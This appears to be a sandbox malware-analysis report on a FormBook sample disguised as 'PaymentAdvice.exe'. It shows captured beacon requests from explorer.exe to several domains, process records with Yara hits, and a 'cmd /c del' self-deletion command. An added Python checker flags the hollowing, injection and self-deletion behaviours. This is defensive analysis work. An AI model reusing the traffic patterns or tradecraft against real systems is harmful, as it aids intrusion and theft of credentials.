                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 08 Apr 2021 11:40:24 GMT
                                                                Location: https://www.dajiangzhibo12.com/c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m
                                                                cf-request-id: 0952aab4340000060534b94000000001
                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sRvM3g118sqIQBsa2bsIc7O3QG%2FF3OJi%2B5MHPf3DpyVFNjqMj6brJU2W%2ByxaS2SKHnIfyi3uhVus7xTtchAIR8o5rvHUXPT%2BFkHI7cfSl6iy7l4zcDkm"}],"max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 63cae099ed420605-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                8 | 192.168.2.5 | 49739 | 75.126.101.233 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:29.885621071 CEST | 5534 | OUT | GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.saturnkorp.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:30.030370951 CEST | 5534 | IN | HTTP/1.1 403 Forbidden
                                                                Server: nginx
                                                                Date: Thu, 08 Apr 2021 10:40:29 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                9 | 192.168.2.5 | 49740 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:35.274482965 CEST | 5535 | OUT | GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.sgdivergence.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:35.386007071 CEST | 5536 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Thu, 08 Apr 2021 10:40:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_krJKxvoEtf15lUs2P5mAQq5TZaYYNajKZmmmE6A9Q0EVcBQ8bZrmX79LcThPHtKxYSWGnORZpnzigiOJ3nbBqA==
                                                                Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 72 4a 4b 78 76 6f 45 74 66 31 35 6c 55 73 32 50 35 6d 41 51 71 35 54 5a 61 59 59 4e 61 6a 4b 5a 6d 6d 6d 45 36 41 39 51 30 45 56 63 42 51 38 62 5a 72 6d 58 37 39 4c 63 54 68 50 48 74 4b 78 59 53 57 47 6e 4f 52 5a 70 6e 7a 69 67 69 4f 4a 33 6e 62 42 71 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 
3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_krJKxvoEtf15lUs2P5mAQq5TZaYYNajKZmmmE6A9Q0EVcBQ8bZrmX79LcThPHtKxYSWGnORZpnzigiOJ3nbBqA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior


                                                                System Behavior

                                                                General

                                                                Start time:12:38:35
                                                                Start date:08/04/2021
                                                                Path:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PaymentAdvice.exe'
                                                                Imagebase:0x400000
                                                                File size:357134 bytes
                                                                MD5 hash:91937D3F9E93657C18129FF519B7F340
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:12:38:36
                                                                Start date:08/04/2021
                                                                Path:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PaymentAdvice.exe'
                                                                Imagebase:0x400000
                                                                File size:357134 bytes
                                                                MD5 hash:91937D3F9E93657C18129FF519B7F340
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                General

                                                                Start time:12:38:44
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff693d90000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:12:38:56
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                Imagebase:0xb00000
                                                                File size:59904 bytes
                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:high

                                                                General

                                                                Start time:12:39:00
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
                                                                Imagebase:0x980000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:12:39:01
                                                                Start date:08/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7ecfc0000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
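The process records above show the full chain: the sample is started twice with an identical command line one second apart (the second instance is the hollowing target, with the FormBook Yara hit sitting at its own image base 0x400000), code then appears in explorer.exe and in a freshly spawned msiexec.exe, and cmd.exe is used to delete the original file. The following checker is an added example and is not part of the Joe Sandbox report; it parses a condensed copy of these "General" records (constructed from the page, conhost.exe omitted) and flags each of those behaviours. It assumes that the fourth and fifth fields of a dump name such as `00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp` are the region base address and its Win32 page-protection value (0x40 = PAGE_EXECUTE_READWRITE); that field layout is an assumption, not documented on this page.

```python
import re
from dataclasses import dataclass, field

# Constructed input: the report's process records, trimmed to the fields used.
REPORT = r"""
General
Start time:12:38:35
Path:C:\Users\user\Desktop\PaymentAdvice.exe
Commandline:'C:\Users\user\Desktop\PaymentAdvice.exe'
Imagebase:0x400000
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, Author: Joe Security

General
Start time:12:38:36
Path:C:\Users\user\Desktop\PaymentAdvice.exe
Commandline:'C:\Users\user\Desktop\PaymentAdvice.exe'
Imagebase:0x400000
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

General
Start time:12:38:44
Path:C:\Windows\explorer.exe
Commandline:
Imagebase:0x7ff693d90000

General
Start time:12:38:56
Path:C:\Windows\SysWOW64\msiexec.exe
Commandline:C:\Windows\SysWOW64\msiexec.exe
Imagebase:0xb00000
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, Author: Joe Security

General
Start time:12:39:00
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:/c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
Imagebase:0x980000
"""

PAGE_EXECUTE_READWRITE = 0x40  # assumption: 5th dump-name field is a Win32 page protection
SOURCE_RE = re.compile(r"Source: \d{8}\.\d{8}\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.")


@dataclass
class Proc:
    start: int = 0          # seconds since midnight
    path: str = ""
    cmdline: str = ""
    imagebase: int = 0
    yara: list = field(default_factory=list)   # (rule, region base, protection)


def parse_report(text):
    """Turn the flattened key:value records into Proc objects, one per 'General' block."""
    procs, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "General":
            cur = Proc()
            procs.append(cur)
        elif not line or cur is None:
            continue
        elif line.startswith("Start time:"):
            h, m, s = (int(x) for x in line[len("Start time:"):].split(":"))
            cur.start = h * 3600 + m * 60 + s
        elif line.startswith("Path:"):
            cur.path = line[len("Path:"):]
        elif line.startswith("Commandline:"):
            cur.cmdline = line[len("Commandline:"):]
        elif line.startswith("Imagebase:"):
            cur.imagebase = int(line[len("Imagebase:"):], 16)
        elif line.startswith("• Rule:"):
            rule = line[len("• Rule:"):].split(",", 1)[0].strip()
            m = SOURCE_RE.search(line)
            if m:
                cur.yara.append((rule, int(m.group(1), 16), int(m.group(2), 16)))
    return procs


def self_deletion(procs):
    """cmd.exe told to delete a file that another recorded process ran from."""
    ran_from = {p.path.lower() for p in procs}
    hits = []
    for p in procs:
        m = re.search(r"/c\s+del\s+'?(.+?)'?\s*$", p.cmdline, re.I)
        if p.path.lower().endswith("\\cmd.exe") and m and m.group(1).lower() in ran_from:
            hits.append((p.start, m.group(1)))
    return hits


def hollowed_images(procs):
    """Family Yara hit exactly at a process's own image base in an RWX region:
    the mapped image was replaced in place (process hollowing)."""
    return [(p.start, p.path, rule) for p in procs for rule, base, prot in p.yara
            if base == p.imagebase and prot == PAGE_EXECUTE_READWRITE]


def duplicate_launch(procs, window=5):
    """Same image with an identical command line started twice within `window`
    seconds: the second instance is the usual hollowing target."""
    return [(a.start, b.start, a.path) for i, a in enumerate(procs) for b in procs[i + 1:]
            if a.path == b.path and a.cmdline == b.cmdline and 0 <= b.start - a.start <= window]


def injected_system_processes(procs):
    """RWX region carrying a family Yara hit inside a process whose image lives
    under the Windows directory: code injected into a system binary."""
    return [(p.path, rule, hex(base)) for p in procs if p.path.lower().startswith("c:\\windows\\")
            for rule, base, prot in p.yara if prot == PAGE_EXECUTE_READWRITE]


if __name__ == "__main__":
    found = parse_report(REPORT)
    for name, check in [("self-deletion", self_deletion), ("hollowed image", hollowed_images),
                        ("duplicate launch", duplicate_launch),
                        ("injected system process", injected_system_processes)]:
        for hit in check(found):
            print(f"[{name}] {hit}")
```

Run on the condensed records, the checker reports one hit per rule: the `cmd /c del` of the sample path, the second PaymentAdvice.exe instance with the Yara hit at its image base, the two launches one second apart, and the RWX FormBook region in msiexec.exe. explorer.exe has no Yara match listed in the report, so it is not flagged by the last rule even though the report's signatures record injection into it; a production version would add the thread-context and APC-queue events as a second signal.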

                                                                Disassembly

                                                                Code Analysis
